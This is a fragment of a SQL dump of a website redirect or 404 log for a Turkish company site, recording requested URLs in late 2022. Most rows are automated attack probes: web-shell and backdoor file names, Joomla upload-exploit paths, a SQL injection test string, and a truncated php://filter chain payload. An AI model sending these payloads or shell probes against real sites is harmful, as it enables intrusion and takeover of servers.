00:00:00',301),(30487,'http://3s-technologies.com.tr/tr/wp-includes/radio.php',NULL,'','',24,0,'2022-10-29 01:20:22','0000-00-00 00:00:00',301),(30488,'http://3s-technologies.com.tr/tr/xhell.php',NULL,'','',11,0,'2022-10-29 01:21:19','0000-00-00 00:00:00',301),(30489,'http://3s-technologies.com.tr/en/blogs/wp-includes/js/wp-pointer.js',NULL,'http://3s-technologies.com.tr/blogs/wp-includes/js/wp-pointer.js','',1,0,'2022-10-30 09:23:32','0000-00-00 00:00:00',301),(30490,'http://www.3s-technologies.com.tr/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',8,0,'2022-10-31 07:35:01','0000-00-00 00:00:00',301),(30491,'http://www.3s-technologies.com.tr/wp-plain.php',NULL,'www.google.com','',8,0,'2022-10-31 07:35:01','0000-00-00 00:00:00',301),(30492,'http://www.3s-technologies.com.tr/alfacgiapi/perl.alfa',NULL,'www.google.com','',8,0,'2022-10-31 07:35:02','0000-00-00 00:00:00',301),(30493,'https://www.3s-technologies.com.tr/wp-plain.php',NULL,'www.google.com','',8,0,'2022-10-31 07:35:03','0000-00-00 00:00:00',301),(30494,'https://3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing',NULL,'','',8,0,'2022-10-31 15:01:13','0000-00-00 00:00:00',301),(30495,'http://www.3s-technologies.com.tr/tr/telerik.web.ui.dialoghandler.aspx',NULL,'','',2,0,'2022-10-31 16:33:06','0000-00-00 00:00:00',301),(30496,'http://www.3s-technologies.com.tr/tr/dialoghandler.aspx',NULL,'','',2,0,'2022-10-31 16:33:43','0000-00-00 00:00:00',301),(30497,'https://3s-technologies.com.tr/en/wp-content/themes/seotheme/db.php?u',NULL,'www.google.com','',38,0,'2022-10-31 20:04:25','0000-00-00 00:00:00',301),(30498,'https://3s-technologies.com.tr/tr/test.php.gif',NULL,'','',11,0,'2022-11-02 00:00:03','0000-00-00 00:00:00',301),(30499,'https://3s-technologies.com.tr/tr/images/jdownloads/screenshots/test.php.j',NULL,'','',12,0,'2022-11-02 00:00:08','0000-00-00 00:00:00',301),(30500,'https://3s-technologies.com.tr/components/com_creativecontactform/fileupload/index.php',NULL,'','',11,0,'2022-11-02 00:00:09','0000-00-00 00:00:00',301),(30501,'https://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',11,0,'2022-11-02 00:00:11','0000-00-00 00:00:00',301),(30502,'https://3s-technologies.com.tr/components/com_sexycontactform/fileupload/index.php',NULL,'','',11,0,'2022-11-02 00:00:13','0000-00-00 00:00:00',301),(30503,'https://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',11,0,'2022-11-02 00:00:15','0000-00-00 00:00:00',301),(30504,'https://3s-technologies.com.tr/tr/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',11,0,'2022-11-02 00:00:19','0000-00-00 00:00:00',301),(30505,'https://3s-technologies.com.tr/tr/tmp/plupload/test.php',NULL,'','',11,0,'2022-11-02 00:00:21','0000-00-00 00:00:00',301),(30506,'https://3s-technologies.com.tr/en/using-joomla/extensions/test.php.gif',NULL,'','',6,0,'2022-11-02 00:00:22','0000-00-00 00:00:00',301),(30507,'https://3s-technologies.com.tr/en/using-joomla/extensions/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',6,0,'2022-11-02 00:00:24','0000-00-00 00:00:00',301),(30508,'https://3s-technologies.com.tr/en/using-joomla/extensions/images/jdownloads/screenshots/test.php.j',NULL,'','',6,0,'2022-11-02 00:00:26','0000-00-00 00:00:00',301),(30509,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/com_creativecontactform/fileupload/index.php',NULL,'','',6,0,'2022-11-02 00:00:28','0000-00-00 00:00:00',301),(30510,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',6,0,'2022-11-02 00:00:30','0000-00-00 00:00:00',301),(30511,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/com_sexycontactform/fileupload/index.php',NULL,'','',6,0,'2022-11-02 00:00:32','0000-00-00 00:00:00',301),(30512,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',6,0,'2022-11-02 00:00:33','0000-00-00 00:00:00',301),(30513,'https://3s-technologies.com.tr/en/using-joomla/extensions/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',6,0,'2022-11-02 00:00:35','0000-00-00 00:00:00',301),(30514,'https://3s-technologies.com.tr/en/using-joomla/extensions/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',6,0,'2022-11-02 00:00:36','0000-00-00 00:00:00',301),(30515,'https://3s-technologies.com.tr/en/using-joomla/extensions/tmp/plupload/test.php',NULL,'','',6,0,'2022-11-02 00:00:38','0000-00-00 00:00:00',301),(30516,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php?u',NULL,'http://3s-technologies.com.tr//wp-content/themes/seotheme/db.php?u','',32,0,'2022-11-03 06:32:15','0000-00-00 00:00:00',301),(30517,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?looponce=wezvv&small=hrmqw&position=vtkyt&pdf=w2xz4&navigation=r8qw3&avplayercontainer=ahnxo&line=hg7jl&template=t2k4t&hidden=r4xys&breadcrumbs=q4tyt&itemid=itfo0&id=5hqzk&itemlistelement=h7bps&skiplinks=1pn2j&defer=jmees&breadcrumbs=gtuni&contentarea=ofvyj&css3=ifdhs&allvideos=rhtcc&category=wobqt&next=qjvks&dir=lzq6k&date=m0kbw&bildauf=ozhst&script=nuvcl&divider=opbcs&fontsize=yhd7x&resettitle=vvhfa&header1=n4nwj&layout=t9rk0&wrapper2=1rrs8&author=qkdzf&inlanguage=ajqin&php_path=iyin8&pageview=ytjbt&altclose=hybz1&site=tfcaz&view=ehbcf&reset=amk4s&moduletable=f7ql6&delay=p6pdk&200=jiimf&smaller=2aimc&main=9lrbb&document=y9wol&unseen=algsj&bigger=p35wz&left=u74rt&vmmenu=un9wy&mod=za7l0&nav=l8rbb&prev96=cmyrc&name=s5maw&linear=ckeza&breadcrumb=ztxdh&biggertitle=ip8w0&easeinoutsine=wjtf9&download=dacgj&djslider96=q5rvq&duration=hmoy4&back=0uqi1&footer=esly8&func=y9vtk&path=ghbyo&load=hz1kn&content=pkzr8&bildzu=p5lkb&rightclose=tghee&go=dkelw&cat=hycvk&preload=2bedn&pause=vuska&folder=zzyjx&vmopen=uurd2&inc=2gmxk&active=iukfl&smaller=sqfhg&avplayerblock=itbab&logo=jnnzc&629=t0uly&rightopen=wfiaf&800=majzb&modules=x3i8l&section=hglit&detail=pxa2v&cookiedomain=upxuo&transition=qssvu&metadata=ahg5o&page=8atak&avplayer=poigy&navigation96=z6a7x&900=cprua&backh2=8e20z&avdownloadlink=rrihc&pg=kyh50&post=reev6&description=ko7bp&bigger=wymma&slider96=buhrp&menu=f2kbg&type=jncxj&action=s2knx&width=h2sif&logo=h8vzq&pause96=s18ma&play96=nm3cu&wrap=gyudp&vmclose=n7rxv&base=ufb1b&next96=hpxul&previous=kvsan&style=howzt&profile=rsdco&locate=mksy8&lang=tunnm&search=vugki&print=3cmgi&all=vzl3e&p=emwsj&fontsizetitle=onhjo&smallertitle=jfxof&prefix=mptnk&pathway=jm5mb&play=x6tsn&include=zbt7i&logoheader=pqg2u&board=l6ek6&generator=qsv19&reset=ymith&task=czlq0&stylesheet=61snm&ltr=mkft7&doc=jygtk&backh3=6c28q&altopen=8kg6s&auto=54pen&file=ijsrc&conf=kxbjf&articlebody=sqm6e&searchword=uxd7u&url=2xztn&item=udw2d&big=pptd7&send=kmwve&ba',NULL,'','',1,0,'2022-11-03 21:06:53','0000-00-00 00:00:00',301),(30518,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?mod=f7fdz&bildauf=zrdic&pathway=j2njx&breadcrumb=xjgec&main=wepwu&avplayerblock=madc4&pause=myif2&modules=kulsx&navigation96=8xsrf&section=xncxz&func=lgdzy&900=gwdsj&cookiedomain=3mgoa&description=qlcgm&category=wlfo1&template=ouv5d&looponce=1hnld&inc=d9i1r&itemid=klobe&site=yilc7&duration=nirbr&all=bzo4r&pause96=5amdr&menu=pkakm&cat=k6i1j&name=bujlg&ltr=7w4pr&big=5jixg&type=7umze&content=hxkq4&action=ytunz&articlebody=jvpbc&board=xvzr4&logo=btdsq&back=klnkc&css3=g6rhp&next96=2rvo8&generator=5uhzg&vmopen=phln9&item=2oesp&easeinoutsine=ywmrq&defer=zreim&date=jodcq&linear=wwq4x&previous=a6qnh&pageview=2jlkp&include=tjqb6&fontsizetitle=xwcab&load=neryb&play=7pkhs&bigger=kyo1c&800=4ga0y&active=uqjyt&author=r32z0&delay=2upwi&header=v1mim&200=xxjwi&avplayercontainer=d2mtm&altopen=qsc57&base=ctxqo&breadcrumbs=armz5&djslider96=armtq&avdownloadlink=hm24l&inlanguage=rfs8c&breadcrumbs=dwsf6&show=pxyxp&option=tiotg&pg=iv5az&root=juvis&logoheader=ut5xg&url=6ylso&nav=a6ekb&backh=dq7ca&folder=viisj&keywords=f8yqq&layout=bm6cp&path=jadc1&divider=gl3bd&conf=ohrog&altclose=plnkn&reset=aekrh&backh3=v9hwr&itemlistelement=wudlg&629=r1dct&dir=6mnsr&bildzu=qkh1s&biggertitle=e9p67&fontsize=yd12e&css3transition=89fq9&left=y2typ&smaller=pye74&download=kadqz&locate=bv5sa&header1=sango&view=ljb6r&title=mlu6r&detail=0co38&document=o3q3q&allvideos=vr00w&prefix=zennt&php_path=yq0fx&logo=ybnkz&avplayer=qw0pf&footer=nzjya&create=ri66b&vmmenu=bvcxn&line=oapnt&print=c7znp&pdf=rqlhf&hidden=rmqmp&id=23re4&moduletable=buhtd&vmclose=tr1nr&doc=bjul6&direction=zhuz7&go=9093f&page=jkju7&contentarea=bggtc&navigation=fhmr8&next=xlpom&p=aux3e&lang=jg8sm&bigger=qzpwe&metadata=wfjob&style=jcipd&auto=1lcys&backh2=sbro9&file=sxlrr',NULL,'','',1,0,'2022-11-03 21:06:54','0000-00-00 00:00:00',301),(30519,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?reset=3sdy5&prefix=fq6oh&file=bu3li&layout=octh7&url=glc0n&name=xbzur&dir=yhewf&locate=nxkbk&cat=ody6f&menu=nkaec&date=2vfug&id=incuw&modules=qjhc2&title=uaqf1&p=ituvv&template=tvlyp&path=jgjeh&inc=f72ae&vmmenu=mlvnu&all=miusm&action=sub3g&allvideos=4wpgl&conf=dnkzc&900=ohqlf&func=yz8nn&site=5to7b&content=ln5bs&include=8tb8n&play=gyq6u&smaller=e1c6w&mod=1c2fz&itemid=cbivx&board=orfnr&vmopen=f15uy&pause=mecyb&download=fkx2u&show=xtuha&breadcrumbs=zhups&root=h2khy&print=juluu&200=h4qi2&pg=do7yq&doc=rzkgt&page=bwhtt&lang=3sddf&active=6cjaw&629=qshnq&php_path=a2drx&type=3m7ud&pdf=hz1xf&view=1jnur&vmclose=hcqyy&document=leheo&go=h0n8x&logo=awx0q&style=pgoou&folder=vn2kj&previous=lq80i&bigger=1jctl&next=luymm&detail=zglqo&section=folqy&category=ejdjy&800=mqpmk',NULL,'','',1,0,'2022-11-03 21:06:54','0000-00-00 00:00:00',301),(30520,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?base=dnvsr&option=rz8sh&generator=cpjin&metadata=qwvtr&load=zolqz&author=swsgj&description=etsv9&altclose=3hvtb&avplayer=yi04g&keywords=qebib&breadcrumb=hpvxh&big=bhqtm&itemlistelement=7dhj4&fontsizetitle=4grkf&bildzu=nepe0&breadcrumbs=dlllg&backh=cbr8z&looponce=ychg4&duration=hk9sm&bigger=tyhgl&inlanguage=ykdgs&header1=zc1z9&back=4oxvh&backh3=47hn3&main=zkrh9&divider=pvfmu&create=nghrc&easeinoutsine=2zyhx&avdownloadlink=rftu4&defer=8wkvm&navigation=3i14v&pageview=gqcbl&nav=5oabq&avplayercontainer=tdu9u&backh2=xmcxm&articlebody=px0jc&hidden=wxtst&line=um10y&delay=gpvgz&djslider96=cka6j&css3transition=u5kpv&pause96=fo3kh&linear=tqpfi&item=qgzit&logoheader=vbyao&biggertitle=gmyld&bildauf=8sfou&fontsize=h1yoo&direction=dkyzb&css3=beflc&next96=pssin&cookiedomain=msdib&logo=uaymm&auto=uhr42&header=eropa&navigation96=8jmrs&contentarea=5ixzk&moduletable=lcdiq&altopen=gdmhh&footer=tkg0e&left=e0oe1&ltr=4yw0a&avplayerblock=mo4p0&pathway=qeqxg',NULL,'','',1,0,'2022-11-03 21:06:54','0000-00-00 00:00:00',301),(30521,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?vmclose=9fekm&smaller=vmttg&629=ybplg&900=9d8db&vmmenu=yeza8&print=3slj6&active=cacsh&200=brfyj&section=qgcak&allvideos=4hdin&type=8t3pk&id=rntrw&modules=870vp&menu=ok882&next=lwkvd&bigger=qqfxz&pause=8zp3l&vmopen=0bhtv&breadcrumbs=3rvjb&prefix=0e1fj&800=fwafo&logo=c3miq&play=rtjvv&url=n5bhn&func=2wcdw&reset=lrhgi&all=fhrww&previous=gjlan&pg=vndcj&layout=m5l0x&itemid=za30d&altclose=iomkp',NULL,'','',1,0,'2022-11-03 21:06:55','0000-00-00 00:00:00',301),(30522,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?moduletable=isuti&logo=voclb&generator=imdrs&header1=o2zqn&linear=ekz0z&pageview=sh7pg&fontsizetitle=ru418&looponce=hrp2m&hidden=8vc0m&next96=ufx7q&pathway=iz1vs&fontsize=b9v9v&option=tvizg&load=szh6r&inlanguage=qsuah&navigation=9dcwz&metadata=tq2hd&itemlistelement=c6da4&navigation96=mvzlr&logoheader=czxtn&keywords=k4t3w&easeinoutsine=xlhux&left=ut2ac&item=xf1zl&line=4dime&nav=ik1ws&header=e3oz0&main=qr0k6&ltr=jvitw&footer=zbt4q&pause96=pvzwb',NULL,'','',1,0,'2022-11-03 21:06:55','0000-00-00 00:00:00',301),(30523,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?pause96=cusor&metadata=hc4p8&ltr=1bb6j&option=qtdbu&pageview=hpv8t&navigation96=mtdwe&logoheader=udfjl&logo=nslnu&nav=vuw7b&pathway=2whm5&looponce=fnkeo&next96=nsu7f&navigation=c9wdl&moduletable=jjxgu&main=taqzj',NULL,'','',1,0,'2022-11-03 21:06:57','0000-00-00 00:00:00',301),(30524,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?option=3h2tu&navigation96=jlwpw&pageview=vzjit&pause96=pgbm6&pathway=zwoys&navigation=ysnsa&next96=3avz5',NULL,'','',1,0,'2022-11-03 21:06:59','0000-00-00 00:00:00',301),(30525,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?menu=ca5se&629=eq0tx&200=ielju&id=ffinw',NULL,'','',1,0,'2022-11-03 21:06:59','0000-00-00 00:00:00',301),(30526,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?navigation=xcdno&option=ffexv&navigation96=kgajr&next96=afdtn',NULL,'','',1,0,'2022-11-03 21:07:00','0000-00-00 00:00:00',301),(30527,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?option=tuqd8&next96=el2rj',NULL,'','',1,0,'2022-11-03 21:07:01','0000-00-00 00:00:00',301),(30528,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-milling?option=z7lhq',NULL,'','',1,0,'2022-11-03 21:07:03','0000-00-00 00:00:00',301),(30529,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kazıma-millingc4=php://filter/convert.iconv.utf8.csiso2022kr|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.cp866.csunicode|convert.iconv.csisolatin5.iso_6937-2|convert.iconv.cp950.utf-16be|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.865.utf16|convert.iconv.cp901.iso6937|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.se2.utf-16|convert.iconv.csibm1161.ibm-932|convert.iconv.ms932.ms936|convert.iconv.big5.johab|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.se2.utf-16|convert.iconv.csibm921.naplps|convert.iconv.855.cp936|convert.iconv.ibm-932.utf-8|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.ibm869.utf16|convert.iconv.l3.csiso90|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.l6.unicode|convert.iconv.cp1282.iso-ir-90|convert.iconv.csa_t500.l4|convert.iconv.iso_8859-2.iso-ir-103|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.863.utf-16|convert.iconv.iso6937.utf16le|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.inis.utf16|convert.iconv.csibm1133.ibm943|convert.iconv.gbk.big5|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.863.unicode|convert.iconv.isiri3342.ucs4|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.inis.utf16|convert.iconv.csibm1133.ibm943|convert.iconv.gbk.sjis|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.cp367.utf-16|convert.iconv.csibm901.shift_jisx0213|convert.iconv.uhc.cp1361|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.dec.utf-16|convert.iconv.iso8859-9.iso_6937-2|convert.iconv.utf16.gb13000|convert.base64-decode|convert.base64-encode|convert.iconv.utf8.utf7|convert.iconv.ibm869.utf16|convert.iconv.l3.csiso90|conver',NULL,'','',1,0,'2022-11-04 08:54:19','0000-00-00 00:00:00',301),(30530,'http://3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.php',NULL,'','',247,0,'2022-11-04 09:11:47','0000-00-00 00:00:00',301),(30531,'http://3s-technologies.com.tr/tr/wp-content/themes/seoplugins/mar.php',NULL,'','',11,0,'2022-11-04 09:11:48','0000-00-00 00:00:00',301),(30532,'http://3s-technologies.com.tr/en/using-joomla/extensions/test.php.gif',NULL,'','',4,0,'2022-11-04 13:59:08','0000-00-00 00:00:00',301),(30533,'http://3s-technologies.com.tr/en/using-joomla/extensions/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',4,0,'2022-11-04 13:59:09','0000-00-00 00:00:00',301),(30534,'http://3s-technologies.com.tr/en/using-joomla/extensions/images/jdownloads/screenshots/test.php.j',NULL,'','',4,0,'2022-11-04 13:59:09','0000-00-00 00:00:00',301),(30535,'http://3s-technologies.com.tr/en/using-joomla/extensions/components/com_creativecontactform/fileupload/index.php',NULL,'','',4,0,'2022-11-04 13:59:09','0000-00-00 00:00:00',301),(30536,'http://3s-technologies.com.tr/en/using-joomla/extensions/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',4,0,'2022-11-04 13:59:09','0000-00-00 00:00:00',301),(30537,'http://3s-technologies.com.tr/en/using-joomla/extensions/components/com_sexycontactform/fileupload/index.php',NULL,'','',4,0,'2022-11-04 13:59:10','0000-00-00 00:00:00',301),(30538,'http://3s-technologies.com.tr/en/using-joomla/extensions/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',4,0,'2022-11-04 13:59:10','0000-00-00 00:00:00',301),(30539,'http://3s-technologies.com.tr/en/using-joomla/extensions/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',4,0,'2022-11-04 13:59:10','0000-00-00 00:00:00',301),(30540,'http://3s-technologies.com.tr/en/using-joomla/extensions/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',4,0,'2022-11-04 13:59:10','0000-00-00 00:00:00',301),(30541,'http://3s-technologies.com.tr/en/using-joomla/extensions/tmp/plupload/test.php',NULL,'','',4,0,'2022-11-04 13:59:10','0000-00-00 00:00:00',301),(30542,'http://3s-technologies.com.tr/tr/test.php.gif',NULL,'','',6,0,'2022-11-04 18:50:50','0000-00-00 00:00:00',301),(30543,'http://3s-technologies.com.tr/tr/images/jdownloads/screenshots/test.php.j',NULL,'','',6,0,'2022-11-04 18:50:51','0000-00-00 00:00:00',301),(30544,'http://3s-technologies.com.tr/components/com_creativecontactform/fileupload/index.php',NULL,'','',6,0,'2022-11-04 18:50:52','0000-00-00 00:00:00',301),(30545,'http://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/test.php',NULL,'','',6,0,'2022-11-04 18:50:53','0000-00-00 00:00:00',301),(30546,'http://3s-technologies.com.tr/tr/components/com_sexycontactform/fileupload/files/test.php',NULL,'','',6,0,'2022-11-04 18:50:54','0000-00-00 00:00:00',301),(30547,'http://3s-technologies.com.tr/tr/images/com_adsmanager/ads/uploaded/test.php',NULL,'','',6,0,'2022-11-04 18:50:55','0000-00-00 00:00:00',301),(30548,'http://3s-technologies.com.tr/tr/tmp/plupload/test.php',NULL,'','',6,0,'2022-11-04 18:50:56','0000-00-00 00:00:00',301),(30549,'http://3s-technologies.com.tr/tr/images/gmapfp/test.php.png',NULL,'','',1,0,'2022-11-07 02:00:25','0000-00-00 00:00:00',301),(30550,'http://3s-technologies.com.tr/tr/images/stories/gmapfp/test.php.png',NULL,'','',1,0,'2022-11-07 02:00:26','0000-00-00 00:00:00',301),(30551,'https://3s-technologies.com.tr/tr/?option=com_content\'nvopzp; and 1=1 or (<\'\">iko)),&view=article\'nvopzp; and 1=1 or (<\'\">iko)),&id=72\'nvopzp; and 1=1 or (<\'\">iko)),&itemid=78\'nvopzp; and 1=1 or (<\'\">iko)),&lang=tr\'nvopzp; and 1=1 or (<\'\">iko)),',NULL,'https://3s-technologies.com.tr/index.php?option=com_content%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&view=article%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&id=72%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&Itemid=78%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&lang=tr%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),','',2,0,'2022-11-08 18:26:03','0000-00-00 00:00:00',301),(30552,'https://3s-technologies.com.tr/tr/js',NULL,'','',9,0,'2022-11-11 08:17:21','0000-00-00 00:00:00',301),(30553,'https://3s-technologies.com.tr/en/using-joomla/extensions/js',NULL,'','',7,0,'2022-11-11 08:17:24','0000-00-00 00:00:00',301),(30554,'http://3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',8,0,'2022-11-11 21:43:13','0000-00-00 00:00:00',301),(30555,'http://3s-technologies.com.tr/en/wp-admin/wp.php',NULL,'','',5,0,'2022-11-13 06:38:28','0000-00-00 00:00:00',301),(30556,'http://3s-technologies.com.tr/en/wp-admin/maint/mari.php',NULL,'','',5,0,'2022-11-13 06:38:29','0000-00-00 00:00:00',301),(30557,'http://3s-technologies.com.tr/en/wp-content/themes/gaukingo/db.php',NULL,'','',9,0,'2022-11-13 06:38:29','0000-00-00 00:00:00',301),(30558,'http://3s-technologies.com.tr/en/wp-content/mari.php',NULL,'','',5,0,'2022-11-13 06:38:30','0000-00-00 00:00:00',301),(30559,'http://3s-technologies.com.tr/en/wp-content/alfa.php',NULL,'','',6,0,'2022-11-13 06:38:31','0000-00-00 00:00:00',301),(30560,'http://3s-technologies.com.tr/en/wp-content/leaf.php',NULL,'','',2,0,'2022-11-13 06:38:32','0000-00-00 00:00:00',301),(30561,'http://3s-technologies.com.tr/en/wp-content/mini.php',NULL,'','',29,0,'2022-11-13 06:38:32','0000-00-00 00:00:00',301),(30562,'http://3s-technologies.com.tr/en/wp-content/plugins/upspy/sllolx.php',NULL,'','',4,0,'2022-11-13 06:38:33','0000-00-00 00:00:00',301),(30563,'http://3s-technologies.com.tr/en/wp-content/maro.php',NULL,'','',4,0,'2022-11-13 06:38:34','0000-00-00 00:00:00',301),(30564,'http://3s-technologies.com.tr/en/wp-content/alpa.php',NULL,'','',2,0,'2022-11-13 06:38:35','0000-00-00 00:00:00',301),(30565,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/admin.php',NULL,'','',4,0,'2022-11-13 06:38:36','0000-00-00 00:00:00',301),(30566,'http://3s-technologies.com.tr/en/wp-tracepeck.php',NULL,'','',2,0,'2022-11-13 06:38:36','0000-00-00 00:00:00',301),(30567,'http://3s-technologies.com.tr/en/tmp/killer.php',NULL,'','',2,0,'2022-11-13 06:38:37','0000-00-00 00:00:00',301),(30568,'http://3s-technologies.com.tr/en/leafmailer.php',NULL,'','',4,0,'2022-11-13 06:38:38','0000-00-00 00:00:00',301),(30569,'http://3s-technologies.com.tr/en/thesmartestx.php',NULL,'','',2,0,'2022-11-13 06:38:38','0000-00-00 00:00:00',301),(30570,'http://3s-technologies.com.tr/en/simple_backdoor.php',NULL,'','',4,0,'2022-11-13 06:38:39','0000-00-00 00:00:00',301),(30571,'http://3s-technologies.com.tr/en/sa.php',NULL,'','',10,0,'2022-11-13 06:38:40','0000-00-00 00:00:00',301),(30572,'http://3s-technologies.com.tr/en/idx.phtml',NULL,'','',3,0,'2022-11-13 06:38:40','0000-00-00 00:00:00',301),(30573,'http://3s-technologies.com.tr/en/haha.php',NULL,'','',2,0,'2022-11-13 06:38:41','0000-00-00 00:00:00',301),(30574,'http://3s-technologies.com.tr/en/herp.php',NULL,'','',2,0,'2022-11-13 06:38:42','0000-00-00 00:00:00',301),(30575,'http://3s-technologies.com.tr/en/hehe.php',NULL,'','',15,0,'2022-11-13 06:38:43','0000-00-00 00:00:00',301),(30576,'http://3s-technologies.com.tr/en/176.php',NULL,'','',2,0,'2022-11-13 06:38:43','0000-00-00 00:00:00',301),(30577,'http://3s-technologies.com.tr/en/images/maro.php',NULL,'','',2,0,'2022-11-13 06:38:44','0000-00-00 00:00:00',301),(30578,'http://3s-technologies.com.tr/en/unknown.php',NULL,'','',13,0,'2022-11-13 06:38:45','0000-00-00 00:00:00',301),(30579,'http://3s-technologies.com.tr/en/wp-includes/leaf.php',NULL,'','',2,0,'2022-11-13 06:38:45','0000-00-00 00:00:00',301),(30580,'http://3s-technologies.com.tr/en/uploads.php',NULL,'','',3,0,'2022-11-13 06:38:46','0000-00-00 00:00:00',301),(30581,'http://3s-technologies.com.tr/en/my_alfa.php',NULL,'','',4,0,'2022-11-13 06:38:47','0000-00-00 00:00:00',301),(30582,'http://3s-technologies.com.tr/en/message.php',NULL,'','',4,0,'2022-11-13 06:38:47','0000-00-00 00:00:00',301),(30583,'http://3s-technologies.com.tr/en/myshell.php',NULL,'','',4,0,'2022-11-13 06:38:48','0000-00-00 00:00:00',301),(30584,'http://3s-technologies.com.tr/en/mailer3.php',NULL,'','',4,0,'2022-11-13 06:38:49','0000-00-00 00:00:00',301),(30585,'http://3s-technologies.com.tr/en/mailer1.php',NULL,'','',5,0,'2022-11-13 06:38:50','0000-00-00 00:00:00',301),(30586,'http://3s-technologies.com.tr/en/images/404.php',NULL,'','',4,0,'2022-11-13 06:38:50','0000-00-00 00:00:00',301),(30587,'http://3s-technologies.com.tr/en/aaaa.php',NULL,'','',3,0,'2022-11-13 06:38:52','0000-00-00 00:00:00',301),(30588,'http://3s-technologies.com.tr/en/wp-admin/maint/shadowx.php',NULL,'','',4,0,'2022-11-13 06:38:53','0000-00-00 00:00:00',301),(30589,'http://3s-technologies.com.tr/en/foxwsov2.php',NULL,'','',4,0,'2022-11-13 06:38:55','0000-00-00 00:00:00',301),(30590,'http://3s-technologies.com.tr/en/r0k.php',NULL,'','',4,0,'2022-11-13 06:38:57','0000-00-00 00:00:00',301),(30591,'http://3s-technologies.com.tr/en/images/daes.php',NULL,'','',2,0,'2022-11-13 06:38:58','0000-00-00 00:00:00',301),(30592,'http://3s-technologies.com.tr/en/images/mini.php',NULL,'','',4,0,'2022-11-13 06:38:58','0000-00-00 00:00:00',301),(30593,'http://3s-technologies.com.tr/en/ids.php',NULL,'','',15,0,'2022-11-13 06:38:59','0000-00-00 00:00:00',301),(30594,'http://3s-technologies.com.tr/en/.well-known/mari.php',NULL,'','',4,0,'2022-11-13 06:39:01','0000-00-00 00:00:00',301),(30595,'http://3s-technologies.com.tr/en/utchiha.php',NULL,'','',2,0,'2022-11-13 06:39:02','0000-00-00 00:00:00',301),(30596,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/tesla.php',NULL,'','',4,0,'2022-11-13 06:39:03','0000-00-00 00:00:00',301),(30597,'http://3s-technologies.com.tr/en/minishell.php',NULL,'','',15,0,'2022-11-13 06:39:04','0000-00-00 00:00:00',301),(30598,'http://3s-technologies.com.tr/en/zero.php',NULL,'','',8,0,'2022-11-13 06:39:05','0000-00-00 00:00:00',301),(30599,'http://3s-technologies.com.tr/en/zat2.php',NULL,'','',2,0,'2022-11-13 06:39:05','0000-00-00 00:00:00',301),(30600,'http://3s-technologies.com.tr/en/lok.php',NULL,'','',2,0,'2022-11-13 06:39:07','0000-00-00 